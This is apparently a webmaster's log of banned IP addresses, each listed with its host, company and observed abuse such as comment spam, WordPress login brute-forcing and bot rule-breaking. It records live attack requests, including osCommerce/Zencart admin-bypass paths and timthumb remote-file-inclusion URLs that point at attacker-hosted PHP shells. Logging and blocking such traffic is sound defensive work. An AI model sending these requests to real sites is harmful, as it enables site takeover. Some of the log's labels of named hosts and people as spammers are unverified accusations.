Company: United States – Great Lakes Internetnamesforbusiness.com
Trying to access {URL}/xmlrpc.php
Malicious User Agent: libwww-perl/5.835
69.49.99.102 Hostname: web104c10.megawebservers.com
Company: United States – Great Lakes Internetnamesforbusiness.com
Trying to access {DOMAIN}//xmlsrv/xmlrpc.php/xmlsrv/xmlrpc.php
{URL}//xmlsrv/xmlrpc.php/xmlsrv/xmlrpc.php
Malicious User Agent: libwww-perl/5.835
72.29.72.173 Hostname: 72-29-72-173.static.dimenoc.com
Company: United States – Orlando Hostdime.com Inc.
Shared hosting server IP
Multiple attemps at wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
URL&amp;sa=U&amp;ei=aiN0UcXRIoOQ8wTk_YGwDQ&amp;ved=0CG8QFjAoOD0&amp;usg=AFQjCNFTzyuLBYFyrqYM4EAuyReUw63fGQ/admin/file_manager.php/login.php
URL&amp;sa=U&amp;ei=aiN0UdquIJLm9gSFjYHgBA&amp;ved=0CFoQFjAeOEc&amp;usg=AFQjCNEZMgYZ6dnCY8BixVH_WjhHsjdmRw/admin/categories.php/login.php
Attack continued ofr more than 60 minutes
192.80.187.162 Hostname: 162.187-80-192.rdns.scalabledns.com
Company: United States – Henderson Enzu Inc
Comment Spammer
142.0.136.27 Company: United States – San Jose Peg Tech Inc Comment Spammer
Bad host: Peg Tech Inc
41.21.173.62 Company: South Africa – Vodacom Isp Networks Looking for script: mt.js
Comment Spammer
216.224.180.238 Hostname: hostilis.com
Company: United States – Pittsford Softcom America Inc.
Shared hosting server IP
Mail server
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
69.64.36.204 Hostname: eagle213.startdedicated.com
Company: United States – Saint Louis Hosting Solutions International Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
142.0.129.120 Company: United States – San Jose Peg Tech Inc Comment Spammer
Bad host: Peg Tech Inc
190.108.80.6 Company: Peru – Lima Internexa S.a. Comment Spammer
192.74.237.61 Company: United States – San Jose Peg Tech Inc Comment Spammer
Bad host: Peg Tech Inc
64.237.39.250 Hostname: hosted-by.reliablesite.net
Company: United States – Greenwich Reliablesite.net Llc
Part of CHOOPA LLC
Shared hosting server IP
Rule breaker:
Some kind of bot – crawled 90 pages in a minute – looked for CSS files
UA: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)”>190.199.35.173 Company: Venezuela, Bolivarian Republic Of – Caracas Cantv Servicios Venezuela Tried to register on site without registration form.
201.243.73.101 Hostname: 201-243-73-101.dyn.dsl.cantv.net
Company: Venezuela, Bolivarian Republic Of – Caracas Cantv Servicios Venezuela
Looked for non-existent script file – mt.js
192.80.186.242 Hostname: 201-243-73-101.dyn.dsl.cantv.net
Company: United States – Henderson Enzu Inc
Comment Spammer
174.142.68.232 Company: Canada – Montreal Iweb Dedicated Cl
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
190.120.227.250 Hostname: mktphone.com.br
Company: Panama – Panama Infolink Panama Corp.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
151.237.189.143 Company: Sweden – Stockholm Deepak Mehta Fie Trackback spammer – trying to access URL/trackback where no trackback function exists
Bad host: Deepak Mehta Fie
142.4.215.194 Hostname: sn63-na.hostingpanel1.com
Company: Canada – Montreal Ovh Hosting Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
192.210.219.193 Hostname: host.colocrossing.com
Company: United States – Buffalo Colocrossing
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/TheStyle/timthumb.php?src=http %3A%2F%2Fflickr.com.drpier-albrech
185.19.217.18 Company: Germany – Hanau Am Main Velia.net Internetdienste Gmbh Comment Spammer
72.11.139.195 Company: United States – Los Angeles Oc3 Networks & Web Solutions Llc
Web server IP: venatra dot com venatra dot net)
Attempting to directly access log files:
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
50.115.163.66 Hostname: kansas1.ausnetworks.com
Company: United States – Kansas City Dnsslave.com
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
199.59.156.150 Hostname: cpanel-02.kyvon.com
Company: United States – Fenton Kyvon
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
66.71.188.44 Hostname: hpux10.hostingplan.net
Company: United States – Parsippany Network Application Services Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/&sa=U&ei=kE9wUbDkCuWN7Abp5YHACA&ved=0CIsCEBYwOzj0Aw&usg=
AFQjCNHfW6hWir8J-pmSBPLYe3MgqusKsQ/admin/banner_manager.php/login.php
/&sa=U&ei=kE9wUc_4DOaR7Aaan4F4&ved=0CIsCEBYwOzj0Aw&usg=
AFQjCNG0xxxKTkqyrjZG-myTBkNdjg5qAw/admin/banner_manager.php/login.php
/&sa=U&ei=Yq5wUcKnAsaJiAK9uYGIBg&ved=0CKkCEBYwWjhk&usg=
AFQjCNFFIzlgzS6pBtX8vJahEfL31nOvPA/admin/categories.php/login.php?action=new_product_preview&cPath
/&sa=U&ei=kE9wUb_3CquS7AaE44D4BQ&ved=0CIsCEBYwOzj0Aw&usg=
AFQjCNG5h4GGavSjTkjMELgP1yqE-jRXAw/admin/file_manager.php/login.php
195.87.191.111 Hostname: investmentsLasVegas.com
Company: Turkey – Istanbul Koc.net Hosting Services
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/&sa=U&ei=Yq5wUcKnAsaJiAK9uYGIBg&ved=0CKkCEBYwWjhk&usg=
AFQjCNFFIzlgzS6pBtX8vJahEfL31nOvPA/admin/categories.php/login.php?action=
new_product_preview&cPath
50.117.80.101 Company: United States – Las Vegas Data Suppliers Trying to login to WordPress with username admin and multiple passwords
69.27.110.240 Company: Canada – Saskatoon Blacksun Inc.
Shared hosting server IP
Trying to login to WordPress admin
/admin/administrators.php/login.php
50.117.80.66 Company: United States – Las Vegas Data Suppliers Trying to login to WordPress with username admin and multiple passwords
198.245.63.133 Hostname: ns4000804.ip-198-245-63.net
Company: Canada – Montreal Ovh Hosting Inc.
Comment Spammer
192.74.234.237 Company: United States – San Jose Fengchen Comment Spammer
198.144.116.77 Company: United States – Torrance Giglinx Inc. Trying to login to WordPress with username admin
65.107.59.68 Hostname: investmentsLasVegas.com
Company: United States – Henderson Stimulus Technologies
Shared hosting server IP
WordPress trackback spammer – Repetitive lookup for xmlrpc.php
64.31.30.90 Hostname: cpanel01.lgvhost.com.br
Company: United States – Dallas Limestone Networks Inc.
website server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
184.82.179.11 Hostname: 184-82-179-11.static.hostnoc.net
Company: United States – Scranton Network Operations Center Inc.
website server IP
Bot trying to register on Drupal site
204.124.181.85 Hostname: rev5.120mkt.info
Company: United States – Scranton Volumedrive.
Bot trying to register on Drupal site
Comment Spammer
69.125.148.150 Hostname: ool-457d9496.dyn.optonline.net
Company: United States – South Amboy Optimum Online
Comment Spammer
37.9.168.12 Hostname: data16.websupport.sk
Company: Slovakia – Bratislava Routing Core
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
41.135.184.184 Hostname: 41-135-184-184.dsl.mweb.co.za
Company: South Africa – Johannesburg Mweb Connect (proprietary) Limited
Comment Spammer / Mail Spammer
Numerous hits on contact form causing failed captcha and error message…
/?msg=fail&shared=email
Bot trawled entire site trying to send e-mail from every page
– There’s only a single page with a contact form
157.56.93.219 Hostname: 41-135-184-184.dsl.mweb.co.za
Company: South Africa – Johannesburg Mweb Connect (proprietary) Limited
User Agent:
Spammer / rule breaker
Bot tried to “reply to post” on every page on site e.g.::
/?replytocom=79
/?ctf_form_num=2&ctf_show_captcha=1&ctf_sm_captcha=1
Another instance of Bing/MSNbot bad activity
111.243.224.224 Hostname: 111-243-224-224.dynamic.hinet.net
Company: Taiwan, Province Of China – Hualian Chtd Chunghwa Telecom Co. Ltd.
Spammer
Banned user agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)
67.23.169.89 Company: United States – Asheville Microglobe Llc Comment Spammer / WordPress trackback spammer
208.115.226.212 Hostname: radiomotorola-acent.com
Company: United States – Dallas Limestone Networks Inc.
website server IP
Trackback spammer / mail server / bad host
193.110.164.47 Hostname: kalns.mono.lv
Company: Latvia – Riga Sia Mwtv
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/plugins/timthumb-vulnerability-scanner/cg-tvs-admin-panel.php?src=http
%3A%2F%2Fflickr.com.blumenlendlefloral.com%2Fsh.php
198.144.116.50 Company: United States – Torrance Giglinx Inc. Trying to login to WordPress with username admin
209.73.151.64 Company: United States – San Jose House Communications Dictionary Attack:
Trying to login to WordPress with username admin and multiple passwords
198.144.116.144 Company: United States – Torrance Giglinx Inc. Dictionary Attack:
Trying to login to WordPress with username admin and multiple passwords
50.117.80.220 Company: United States – Torrance Giglinx Inc. Dictionary Attack:
Trying to login to WordPress with username admin and multiple passwords
142.0.136.26 Company: United States – San Jose 38dns Comment Spammer
67.23.252.134 Hostname: server.sv1wh.com
Company: United States – Orlando Hostdime.com Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
198.1.126.68 Hostname: evo.evoluzionarywebs.com
Company: United States – Temecula Unified Layer
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
174.142.246.41 Hostname: i13-118.ich-12.com
Company: Canada – Montreal Serversp
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/plugins/wp_roknewspager/thumb.php?src=http
%3A%2F%2Fpicasa.com.fm-pulizie.it%2Fxgood.php
184.82.29.169 Hostname: 184-82-29-169.superslickydeals.com
Company: United States – Scranton Prime Directive Llc
Brute Force/Dictionary Attack to login to WordPress with username admin and multiple passwords
65.222.202.202 Company: United States – Arlington Old Dominion Internet Accessed one page without a referrer then crawled image, Java and Stylesheets
without loading any further pages
209.73.151.97 Company: United States – San Jose Tibbo Trying to login to WordPress with username admin
209.73.151.229 Company: United States – San Jose Ling Wang Internet Co Ltd Trying to login to WordPress with username admin
199.217.115.38 Hostname: hawk179.startdedicated.com
Company: United States – Saint Louis Hosting Solutions International Inc.
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/plugins/akismet/timthumb.php?src=http
%3A%2F%2Fflickr.com.tr.realityinformatica.com%2Fbad.php
/wp-content/plugins/akismet/timthumb.php?src=http
%3A%2F%2Fflickr.com.tr.realityinfo
192.74.243.124 Company: United States – San Jose Le Yi Comment/Trackback Spammer
194.146.132.135 Hostname: nat135.iteam.ua
Company: Ukraine – Luhans’k Pp Poisk-lugansk
Comment/Trackback Spammer
37.59.66.254 Company: France – Roubaix Ovh Systems Comment/Trackback Spammer
209.188.9.138 Company: United States – Phoenix Secured Servers Llc Brute Force attempt to login to Drupal site
/user/register, /quicklogin.one, reg.asp, /logging.php, /register.php, /CreateUser.asp,
/bokeindex.asp, /modules.php, /member.php, /sign_up.html, /tiki-register.php, /signup,
/registration_rules.asp, /index_do.php, /member.php/register.php, /reg.php, /join.php, /join_form.php
199.189.255.70 Hostname: rdns-199.189.255.70.micfo.com
Company: United States – New York City Micfo Llc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
157.56.93.211 Hostname: msnbot-157-56-93-211.search.msn.com
Company: United States – Redmond Microsoft Corp
Bing Bot – User Agent:
Mozilla/5.0 (compatible; bingbot/2.0; +http: //www.bing.com/bingbot.htm)
Rule Breaker – crawling disallowed paths
192.74.255.73 Company: United States – San Jose Star Idc Comment Spammer
Found Honeypot trap
66.135.44.124 Company: United States – San Antonio Serverbeach Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
65.181.126.110 Company: United States – Clifton Solar Vps Remote File Inclusion attempt / WordPress timthumb RFI exploit:

  • URL/&sa=U&ei=P1JjUavjA8WS7Aat1ICYCA&ved=0CDEQFjAIOBQ&usg=
    AFQjCNHmCjyuDUzLxA4JjDQhAx4-OueUIQ/wp-content/themes/eStore/timthumb.php?src=http %3A%2F%2Fistroy.org.ua%2Fstats%2Fbad.php
  • URL/&sa=U&ei=PlJjUcioJ6XE7Ab8rYHYAg&ved=0CFIQFjASOAo&usg=AFQjCNHZhs-SQqvqeZ_t9PHtdtGyDGr7Nw/wp-content/themes/eStore/timthumb.php?src=http %3A%2F%2Fistroy.org.ua%2Fstats%2Fbad.php
  • /wp-content/themes/eStore/timthumb.php?src
66.87.4.20 Hostname: 66-87-4-20.pools.spcsdns.net
Company: United States – Saginaw Sprint Nextel Corporation
Image Hotlinker
Known Mail Server/Dictionary Attacker
174.121.16.219 Hostname: bts.btsd.co.nz
Company: United States – Dallas Theplanet.com Internet Services Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
192.121.44.24 Company: Sweden – Stockholm Proxy Services No user agent
216.172.147.239 Company: United States – San Jose Zheng Yu Trying to login to WordPress with username admin
199.19.109.167 Company: United States – Scranton Volumedrive Comment Spammer
50.117.80.153 Company: United States – Las Vegas Data Suppliers Trying to login to WordPress with username admin
198.144.116.215 Company: United States – Torrance Giglinx Inc. Trying to login to WordPress with username admin
178.238.224.100 Hostname: dc4server4.myserverweb.net
Company: Germany – Muenchen Contabo Gmbh
Brute Force Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/Quadro/timthumb.php?src=http %3A%2F%2Fpicasa.com.fm-pulizie.it%2Fxgood.php
37.59.209.224 Company: France – Roubaix Ovh Systems Bad Host: Roubaix Ovh Systems
37.57.128.140 Hostname: 140.128.57.37.triolan.net
Company: Ukraine – Kharkiv Tov Bank-inform
Banned Region: UKRAINE
69.64.34.171 Hostname: eagle178.startdedicated.com
Company: United States – Saint Louis Hosting Solutions International Inc.
Brute Force Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/plugins/wordpress-gallery-plugin/timthumb.php?src=http
%3A%2F%2Fflickr.com.pharmacyboardkenya.org%2Fmail.php
193.183.105.42 Company: Sweden – Stockholm Proxy Services Comment Spammer (Bot)
192.119.144.235 Company: United States – Dallas Hazel Bender Bot trying to login/register on restricted site
23.23.178.246 Hostname: ec2-23-23-178-246.compute-1.amazonaws.com
Company: United States – Ashburn Amazon.com Inc.
Hacker looking to exploit Drupal
devel/php
update.php
/devel/variable
And trying to find core info
core/CHANGELOG.txt
139.228.35.127 see next Hostname: fm-dyn-139-228-35-127.fast.net.id
Company: Indonesia – Jakarta Pt. First Media Tbk
Comment Spammer (Bot)
41.107.17.178 Company: Algeria – Algiers Djaweb Acces Dynamic Dhcp Mail server/mail harvester/spammer
37.59.88.234 Company: France – Roubaix Ovh Systems Comment/Trackback Spammer
137.117.68.10 Company: United States – Redmond Microsoft Corp Comment Spammer (Bot)
103.247.134.244 Hostname: 103-247-134-244.myrepublic.com.sg
Company: Singapore – Singapore Myrepublic Ltd
Comment Spammer
37.59.162.227 Company: France – Roubaix Ovh Systems Comment Spammer
Bad Host
69.174.52.143 Hostname: vps3946.inmotionhosting.com
Company: United States – Stafford Inmotion Hosting Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
173.0.51.153 Hostname: dns2.bbxware.com
Company: United States – Kansas City Dnsslave.com
Comment Spammer
69.46.79.90 Company: United States – San Jose 5280 Enterprises Llc Comment Spammer
69.160.42.173 Hostname: conversionmarketingteam.com
Company: United States – Phoenix Ecsuite Llc
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/plugins/timthumb-vulnerability-scanner/cg-tvs-admin-panel.php?src=http:
//picasa.com.ganesavaloczi.hu/jos.php
195.182.158.146 Hostname: discomafia.ru
Company: Russian Federation – Saint Petersburg Comlink Ltd
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/plugins/timthumb-meets-tinymce/ttplugin/timthumb.php?src=http:
//flickr.com.m2-lost.com/login.php
109.235.149.27 Company: United Kingdom – Redbourn Bbs Commerce Ltd Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/plugins/timthumb-meets-tinymce/ttplugin/timthumb.php?src=http:
//flickr.com.m2-lost.com/login.php
157.86.172.250 Company: Brazil – Rio De Janeiro Fundacao Oswaldo Cruz Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/plugins/timthumb-meets-tinymce/ttplugin/timthumb.php?src=http:
//flickr.com.m2-lost.com/login.php
173.81.54.133 Hostname: 173-81-54-133-pkbg.atw.dyn.suddenlink.net
Company: United States – Parkersburg Suddenlink Communications
Comment Spammer
37.59.73.96 Company: France – Roubaix Ovh Systems Comment Spammer
Bad Host
157.55.32.142 Hostname: msnbot-157-55-32-142.search.msn.com
Company: United States – Redmond Microsoft Corp
User Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http: //www.bing.com/bingbot.htm)
Rule Breaker: ignores robots.txt disallow folders/paths rule e,g,:
Disallow: /comment/
Disallow: /comment/reply/
Another example of Bingbot ignoring rules
198.245.63.121 Hostname: ns4000792.ip-198-245-63.net
Company: Canada – Montreal Ovh Hosting Inc.
Comment Spammer
64.119.215.18 Hostname: IP-64-119-215-18.static.fibrenoire.ca
Company: Canada – Montreal Fibrenoire Internet Inc.
Comment Spammer
184.107.223.226 Hostname: host10.biocomin.com
Company: Canada – Montreal Red Inquest
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/News_Blog/scripts/timthumb.php?src=http
%3A%2F%2Fflickr.com.7dkaravansinema.com/bad.php
37.156.224.178 Company: Switzerland – Baar Malene Software Serv Srl Comment Spammer
50.122.38.108 Company: United States – Bloomington Frontier Communications Of America Inc. Comment Spammer
199.193.247.141 Hostname: cs003.rivalhost.com
Company: United States – Edmond Reagormedia Llc Dba Rivalhost .com
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
74.200.193.154 Hostname: server1.adwebhoster.com
Company: United States – Kansas City Layered Technologies Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
192.157.246.42 Hostname: 42.246-157-192.rdns.scalabledns.com
Company: United States – Henderson Enzu Inc
Comment Spammer
192.119.154.217 Company: United States – Dallas Ryan Wilson Comment Spammer
198.143.143.157 Hostname: 32.dofollow8.servinio.com
Company: United States – Chicago Singlehop Inc.
Comment Spammer
193.234.166.54 Company: Sweden – Stockholm Proxy Services Comment Spammer
74.125.187.208 Company: United States – The Dalles Google Inc.
User Agent: Mozilla/5.0 (compatible) Feedfetcher-Google; (+http: //www.google.com/feedfetcher.html)
Constantly trying to link to images.
Known Comment Spammer (Project Honeypot)
173.254.28.28 Hostname: just28.justhost.com
Company: United States – North Olmsted Unified Layer
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/Real-Estate-v1.3/thumb.php/?src=http: //flickr.com.pharmacyboardkenya.org/mail.php
199.201.88.69 Hostname: rstones.rtcwh.com
Company: United States – Novi Vps Datacenter Llc
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/plugins/shortcodes-ultimate/lib/timthumb.php/?src=http: //flickr.com.coolrentals.ro/tim.php
199.58.210.118 Hostname: cipis.ibonusy.net
Company: United States – Herndon Rokabear Llc
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/dg-latest/thumb.php/?src=http: //flickr.com.clean-living.org/bad.php
72.55.143.13 Hostname: 13.143.55.72.in-addr.arpa
Company: Canada – Montreal Iweb Dedicated Cl
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/twicet/timthumb.php/?src=http: //http: //flickr.com.94pianyidian.com/bad.php
181.50.38.69 Hostname: Dynamic-IP-1815003869.cable.net.co
Company: Colombia – Bogota Telmex Colombia S.a.
Looking for WordPress URLs – adding /undefined to end
69.167.155.42 Hostname: host2.solutionspal.com
Company: United States – North Hollywood Liquid Web Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/admin/htmlarea/popups/file/files.php?x=y
67.142.173.24 Hostname: host671420024173.direcway.com
Company: Wilburton Hughes Network Systems
Trojan injection attack – possibly PUSHDO Botnet
74.125.187.232 Company: United States – The Dalles Google Inc.
User Agent: Mozilla/5.0 (compatible) Feedfetcher-Google; (+http: //www.google.com/feedfetcher.html)
Constantly trying to link to images.
Known Comment Spammer
37.113.27.20 Company: Russian Federation – Penza Cjsc Er-telecom Holding Comment Spammer
50.117.59.195 Company: United States San Jose Detectnetwork.us Comment Spammer
74.204.172.210 Hostname: host.mvdstudio.com
Company: United States – Ashburn Virtacore Systems Inc
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
173.232.104.240 Company: Newhall Blue Deals Fly Login/Register bot
Tries to login to site with username jason9166.
199.83.93.117 Hostname: unassigned.psychz.net
Company: United States – New York City Psychz Networks
Website hosting server IP
Looking for WordPress admin paths on Drupal site
75.98.226.29 Hostname: nabco-inc.com
Company: United States – Columbus Ceranet Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
209.140.24.66 Hostname: vps.emodulos.com.br
Company: United States – Page Landis Holdings Inc
Timthumb RFI script attack:
/wp-content/themes/corporate/lib/timthumb/timthumb.php?src=http
%3A%2F%2Fflickr.com.pharmacyboardkenya.org%2Fmail.php
199.193.247.141 Hostname: centos2.hiclx03.hostedincanada.com
Company: Canada – Vancouver Hostedincanada
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
204.244.121.116 Hostname: cs003.rivalhost.com
Company: United States – Edmond Reagormedia Llc Dba Rivalhost.com
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
147.255.162.204 Hostname: 147.255.162.204.rdns.ubiquity.io
Company: United States – Nobis Technology Group Phoenix
Comment Spammer
50.87.8.102 Hostname: 50-87-8-102.unifiedlayer.com
Company: United States – Temecula Unified Layer
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
142.91.162.212 Hostname: 142.91.162.212.rdns.ubiquity.io
Company: United States – Nobis Technology Group Phoenix
Comment Spammer
195.159.29.250 Hostname: ideblogg.client.sysedata.no
Company: Norway – Oslo Powertech Information Systems As
Remote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
//wp-content/gd-star-rating/?src=http%3A%2F%2Fflickr.com.streamwhistle.net/fb/hp.php
198.74.101.231 Hostname: 231-101-74-198-dedicated.multacom.com
Company: United States – Canyon Country Multacom Corporation
Comment Spammer
192.74.231.12 Company: United States – San Jose Peg Tech Inc Comment Spammer
199.204.45.169 Hostname: node-1jfq015.cloud9.ymq1.ca.layeredge.net
Company: Canada – Montreal Vexxhost
Comment Spammer
Mail server
192.95.17.247 Company: United States – Newark Ovh Comment Spammer
194.103.2.235 Company: Sweden Stockholm Resilans Ab Comment Spammer
192.74.236.33 Company: United States – San Jose Peg Tech Inc Comment Spammer
173.192.235.226 Hostname: 173.192.235.226-static.reverse.softlayer.com
Company: United States – Knoxville Softlayer Technologies Inc.
Webserver: siteexplorer.info
Banned Bot
SiteExplorer/1.0b
Rule breaker – ignores robots.txt
User Agent: Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http: //siteexplorer.info/)
50.115.173.25 Company: United States – Kansas City Dnsslave.com Comment Spammer
168.62.165.112 Company: United States – Bristow Microsoft Corp Comment Spammer
184.82.92.232 Hostname: 142.91.79.5.rdns.ubiquity.io
Company: United States – Los Angeles Ubiquity Server Solutions Los Angeles
Login/Register bot
Tries to login to site with username jason9166.
142.91.79.5 Hostname: market4cheap.net
Company: United States – Chandler Dme Hosting Llc
Login/Register bot
Tries to login to site with username jason9166.
50.115.175.253 Company: United States – Kansas City Dnsslave.com Login/Register bot
Tries to login to site with username jason9166.
206.217.142.108 Hostname: host.colocrossing.com
Company: United States – Dallas Sshvm.com Dfw
Login/Register bot
Tries to login to site with username jason9166.
108.163.227.58 Hostname: df44.dofollow.biz
Company: United States – Chicago Singlehop Inc.
Login/Register bot
Tries to login to site with username jason9166.
199.193.255.75 Company: United States – Henderson Enzu Inc Login/Register bot
Tries to login to site with username jason9166.
173.234.196.201 Hostname: 142.91.79.5.rdns.ubiquity.io
Company: United States – Chicago Ubiquity Server Solutions
Junk Website hosting server IP
Login/Register bot
193.148.44.247 Company: Russian Federation – Moscow Fund Of Social Insurance Of Russian Federation Attempting to load scrip files
184.154.48.82 Hostname: s1.960.clients.serverdeals.org
Company: United States – Chicago Singlehop Inc.
UA: Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http: //www.majestic12.co.uk/bot.php?+)
Majestic-12 [bot]
Rule Breaker: doesn’t get robots.txt or ignores rules
108.59.8.80 Hostname: hosted-by.leaseweb.com
Company: United States – Manassas Leaseweb Usa Inc.
UA: Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http: //www.majestic12.co.uk/bot.php?+)
Majestic-12 [bot]
Rule Breaker: doesn’t get robots.txt or ignores rules
173.208.180.234 Hostname: hosted-by.leaseweb.com
Company: United States – Kansas City Wholesale Internet Inc.
UA: Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http: //www.majestic12.co.uk/bot.php?+)
Majestic-12 [bot]
Rule Breaker: doesn’t get robots.txt or ignores rules
142.234.104.54 Hostname: 142.234.104.54.rdns.ubiquity.io
Company: United States – Seattle Ubiquity Server Solutions Seattle
Banned for direct access to:
/xmlrpc.php
/wp-comments-post.php
Comment/trackback spammer
192.119.151.122 Company: United States – Dallas Avante Vps Banned for direct access to:
/xmlrpc.php
/wp-comments-post.php
Suspicious User Agent: PHP/5.2.10
Comment/trackback spammer
108.178.5.74 Hostname: vm12.dofollow11.servinio.com
Company: United States – Chicago Singlehop Inc.
Banned for direct access to:
/xmlrpc.php
/wp-comments-post.php
Suspicious User Agent: PHP/5.2.10
174.136.102.40 Hostname: 21r8s11.syminet.com
Company: United States – Orange Syminet
Known Mail Server.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
173.243.112.171 Hostname: ded4u.com
Company: United States – Stafford Nexeon Technologies Inc.
Spam Harvester
Banned User Agent: Java/1.4.1_04
184.107.48.219 Hostname: server1.basehost.com.br
Company: Canada – Montreal Iweb Dedicated Cl
Shared hosting server
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
